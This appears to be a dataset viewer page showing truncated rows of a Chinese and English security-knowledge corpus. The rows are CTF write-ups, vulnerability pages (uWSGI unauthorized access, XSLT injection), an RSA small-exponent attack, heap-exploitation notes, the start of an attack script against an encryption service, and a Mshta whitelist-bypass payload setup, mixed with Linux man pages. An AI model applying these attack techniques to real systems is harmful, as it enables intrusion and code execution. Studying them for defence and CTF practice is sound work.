# Micro-CMS v1 - FLAG0
## 0x00 Index

## 0x01 Create New Page


It shows **id=9**
## 0x02 Check Other Pages
The Testing page is 1.

The Markdown Test page is 2.

Should be something between 2 - 9.
Page 3, 4, 5, 6, 8 get 404 er... | sec-knowleage |
# Xor-as-a-Service (misc)
```
Xor-as-a-Service is the new hot thing. And we think it's unbreakable!
Hint: nosmt, mds=full and clear of secret dependent algorithms.
```
## Analysis
After solving proof of work, you are given a shell session on a Linux machine.
The `/app` directory contains files of interest that are owne... | sec-knowleage |
# T1583-004-购买基础设施-服务器
## 来自ATT&CK的描述
攻击者可能会购买、租赁或租用可在目标行动中使用的实体服务器。使用服务器可以让攻击者策划、发起和执行行动。在破坏后的活动中,攻击者可以利用服务器执行各种任务,包括用于指挥和控制。与破坏第三方服务器或租用虚拟专用服务器相比,攻击者也可能选择配置和运行自己的服务器来支持行动。
如果攻击者的大部分活动将使用在线基础设施进行,他们可能只需要一个轻量级的设置。或者,如果他们想在自己的系统上测试、通信和控制其活动等其他方面,他们可能需要建立广泛的基础设施。
## 测试案例
无
## 检测日志
无法有效监测
## 测试复现
无
## 测试留痕
无
## 检测规则/思路
无
... | sec-knowleage |
# uWSGI Unauthorized Access Vulnerability
[中文版本(Chinese version)](README.zh-cn.md)
uWSGI is a web application server, which implements protocols such as WSGI/uwsgi/http, and supports for various languages through plugins. More than an application name, uwsgi is also an exchange standard between the front-end server a... | sec-knowleage |
# XSLT Injection
> Processing an un-validated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code
## Summary
- [XSLT Injection](#xslt-injection)
- [Summary](#summary)
- [Tools](#tools)
- [Exploit](#... | sec-knowleage |
# 6-动态调试
---
目标 T6.exe
使用 IDA 打开,找 main 函数,并做基本的分析
可以发现这里一改之前的对输入变量进行修改的风格,直接定义了一个固定的常量。
在 IDA 中设置好断点。这道题我们想查看 strcmp 函数调用时的实参数据,因此在 strcmp 调用处设置一个断点,设置断点的方法是在点击行号旁边的小蓝点。
设置后断点后就可以开始调试
打开 【Debugger】
菜单选中【Select debugger】
---
**Source & Reference**
- [萌新学逆向——T6 动态调试](https://mp.weixin.qq.com/s/3ZvkX3vg4dXkSORbE4g7Dg) | sec-knowleage |
## Interpolation (Reverse, 200p)
NEWTON is an autonomous unmanned aerial vehicle (UAV). Where the UAV is refueled at t=180 ?
Path planning:
t x y
0; 35.645592; 50.951123;
20; 35.144068; 50.467725;
40; 34.729775; 48.204541;
60; 34.204433; 46.117139;
80; 33.602623; 44.908643;
100; 33.1... | sec-knowleage |
#!/usr/bin/python -u
import Crypto
from Crypto.Util.number import ceil_div
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5 as RSAsign
from Crypto.Hash import SHA
#from SECRET import flag
from random import shuffle
import sys
from binascii import b2a_hex
key = RSA.generate(1024)
a=["super", "im... | sec-knowleage |
# Expensive flag (game, 140p, 10 solved)
In this quest we can simply buy the flag, assuming we have 100k of gold.
The only way to make money in the game is to sell metal ingots to the collector, and he pays 1k for every ingot he doesn't yet have.
There are 9 different metals, so we can get 9k.
What about the rest?
If w... | sec-knowleage |
---
title: Git 本地工作流
---
### Git简介
Git是一个开源的分布式版本控制系统,
可以有效、高速的处理从很小到非常大的项目版本管理
### Git特点
开发者可以提交到本地,每个开发者通过克隆(git clone),在本地机器上拷贝一个完整的Git仓库
### 版本控制系统
记录一个或若干文件内容变化,以便将来查阅特定版本修订情况的系统
### Git优点
1. 适合分布式开发,强调个体。
2. 公共服务器压力和数据量都不会太大。
3. 速度快、灵活。
4. 任意两个开发者之间可以很容易的解决冲突。
5. 离线工作。
Git 是一个**版本控制**工具,什么是版本控制,我们下面实际操作一下就一目了然了。
... | sec-knowleage |
# Blockchain Weaknesses
## Double-spending attack
双花问题是电子现金系统中的一个潜在问题,即相同的资金同时支付给两个接收者。区块链系统通过公开账本的方式来避免双花问题,用户广播交易时不会立即将其添加到区块链中,而是等待矿工通过挖矿将其打包在区块中,接收者在确定合法的交易已经添加到区块链之后,才可以认为该交易有效。用户通过在区块链上接收付款时等待确认来保护自己免受双花欺诈,随着确认数量的增加,交易变得更加不可逆转。
但区块链系统并不能完全防止双花,攻击者仍可以通过庞大的哈希计算资源来重新完成已确认区块的工作量证明并使自己所在链成为最长链来逆转交易实现双花,以及可以针对某些未确认交易实现... | sec-knowleage |
date
===
显示或设置系统时间与日期
## 概要
```shell
date [OPTION]... [+FORMAT]
date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]
```
## 主要用途
- 转换时间到选定的格式,默认为当前。
- 设置系统时间。
## 参数
format:输出的时间格式。
```shell
format可用的转义序列如下:
%% 百分号
%a 当地缩写的工作日名称(例如,Sun)
%A 当地完整的工作日名称(例如,Sunday)
%b 当地缩写的月份名称(例如,Jan)
%B 当地完整的月份名称(例... | sec-knowleage |
mount
===
用于挂载Linux系统外的文件
## 补充说明
**mount命令** Linux mount命令是经常会使用到的命令,它用于挂载Linux系统外的文件。
如果通过webdav协议挂载网络磁盘,需要运行指令`apt install davfs2`安装必要的组件
### 语法
```shell
mount [-hV]
mount -a [-fFnrsvw] [-t vfstype]
mount [-fnrsvw] [-o options [,...]] device | dir
mount [-fnrsvw] [-t vfstype] [-o options] device dir
```
### 选项
```... | sec-knowleage |
.\" Copyright (c) 1998 Sendmail, Inc. All rights reserved.
.\" Copyright (c) 1983, 1997 Eric P. Allman. All rights reserved.
.\" Copyright (c) 1985, 1991, 1993
.\" The Regents of the University of California. All rights reserved.
.\"
.\" By using this file, you agree to the terms and conditions set
.\" forth in the ... | sec-knowleage |
import requests
import time
import string
prefx_len = 7
sufx_len = 11
def encrypt(payload):
sessid = 'ln8h6x5zwp6oj2e7kz6zd45hlu97q3yp'
cookies = {'sessionid': sessid}
cookies['AWSELB'] = '033F977F02D671BCE8D4F0E661D7CA8279D94E64EF1BD84608DB9FFA0FC0F2F4F304AC9CD30CDCC86788A845DF98A68A77D605B8BF768114D932... | sec-knowleage |
# Not Another SQLi Challenge
Web, 100 points
## Description:
A link to a website was provided.
```html
<html>
<head>
<title>Central Authentication Service RC1.2</title>
</head>
<body bgcolor="#800000">
<h1 style="color:white">Howdy!</h1>
<img align = "right" src = "/images/logo.png" width="50%">
<div>
... | sec-knowleage |
# REQUIRED: PyCrypto 2.6.1
# To install: pip install pycrypto
# Homepage: https://www.dlitz.net/software/pycrypto/
import argparse
import sys
import socket
from Crypto.Hash import SHA256
def readNullTerminatedString(f):
buf = b''
while True:
if len(buf) > 1 << 20:
raise Exception("Overly long input")
... | sec-knowleage |
.\"{{{}}}
.\"{{{ Title
.TH MESG 1 "May 27, 1997" "" "Linux User's Manual"
.\"}}}
.\"{{{ Name
.SH NAME
mesg \- 调节用户终端的写访问权
.\"}}}
.\"{{{ Synopsis
.SH "总览 (SYNOPSIS)"
.B mesg
.RB [ y | n ]
.\"}}}
.\"{{{ Description
.SH "描述 (DESCRIPTION)"
.B Mesg
控制 其他用户 对 你的终端 的 访问能力. 典型用途 是 允许 或 禁止 其他用户
向 你的终端 输出 数据. (另见 \fBwrite\fP... | sec-knowleage |
### 小公钥指数攻击攻击条件
e 特别小,比如 e 为 3。
### 小公钥指数攻击攻击原理
假设用户使用的密钥 $e=3$。考虑到加密关系满足:
$$
c\equiv m^3 \bmod N
$$
则:
$$
\begin{align*}
m^3 &= c+k\times N\\
m &= \sqrt[3]{c+k\times n}
\end{align*}
$$
攻击者可以从小到大枚举 $k$,依次开三次根,直到开出整数为止。
### 小公钥指数攻击范例
这里我们以 XMan 一期夏令营课堂练习为例进行介绍(Jarvis OJ 有复现),附件中有一个 `flag.enc` 和 `pubkey.pem`,很明显是密文和公钥了,先... | sec-knowleage |
.\" @(#)unicode_start.1 1.0 010203 aeb
.\"*******************************************************************
.\"
.\" This file was generated with po4a. Translate the source file.
.\"
.\"*******************************************************************
.TH UNICODE_START 1 2001年2月3日 kbd
.SH 名称
unicode_start \- 将键盘和控制... | sec-knowleage |
name: Preview Site Wrapper
# Controls when the action will run.
on:
# Triggers the workflow on pull request events but only for the master branch
pull_request:
branches: [ master ]
types: [opened, synchronize, edited, reopened]
# A workflow run is made up of one or more jobs that can run sequentially or ... | sec-knowleage |
# Dynamic Sections
## .interp
这个节包含了程序对应的解释器。
参与动态链接的可执行文件会具有一个 PT_INTERP 类型的程序头元素,以便于来加载程序中的段。在 exec (BA_OS) 过程中,系统会从该节中提取解释器的路径,并根据解释器文件的段创建初始时的程序镜像。也就是说,系统并不使用给定的可执行文件的镜像,而会首先为解释器构造独立的内存镜像。因此,解释器需要从系统处获取控制权,然后为应用程序提供执行环境。
解释器可能有两种方式获取控制权。
1. 它可以接收一个指向文件头的文件描述符,以便于读取可执行文件。它可以使用这个文件描述符来读取并将可执行文件的段映射到内存中。
2. 有时候根据可执行文件... | sec-knowleage |
### Public Blockchain Security Overview定义
> A public blockchain has absolutely no access restrictions. Anyone with an Internet connection can send transactions to it as well as become a validator (i.e., participate in the execution of a consensus protocol). Usually, such networks offer economic incentives for those who... | sec-knowleage |
# Level13
#### About
There is a security check that prevents the program from continuing execution if the user invoking it does not match a specific user id.
To do this level, log in as the level13 account with the password level13. Files for this level can be found in /home/flag13.
#### Source code
```
#include <std... | sec-knowleage |
### House of Rabbit介绍
House of rabbit是一种伪造堆块的技术,早在2017年已经提出,但在最近两个月才在CTF比赛中出现。我们一般运用在fastbin attack中,因为unsorted bin等其它的bin有更好的利用手段。
### House of Rabbit原理
我们知道,fastbin中会把相同的size的被释放的堆块用一个单向链表管理,分配的时候会检查size是否合理,如果不合理程序就会异常退出。而house of rabbit就利用了在malloc consolidate的时候fastbin中的堆块进行合并时size没有进行检查从而伪造一个假的堆块,为进一步的利用做准备。
由于原作者... | sec-knowleage |
### Mshta简介:
Mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。
**说明:**Mshta所在路径已被系统添加PATH环境变量中,因此,可直接执行Mshta.exe命令。
基于白名单Mshta.exe配置payload:
Windows 7 默认位置:
```bash
C:\Windows\System32\mshta.exe
C:\Windows\SysWOW64\mshta.exe
```
**攻击机:**192.168.1.4 Debian
**靶机:** 192.168.1.3 Windo... | sec-knowleage |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.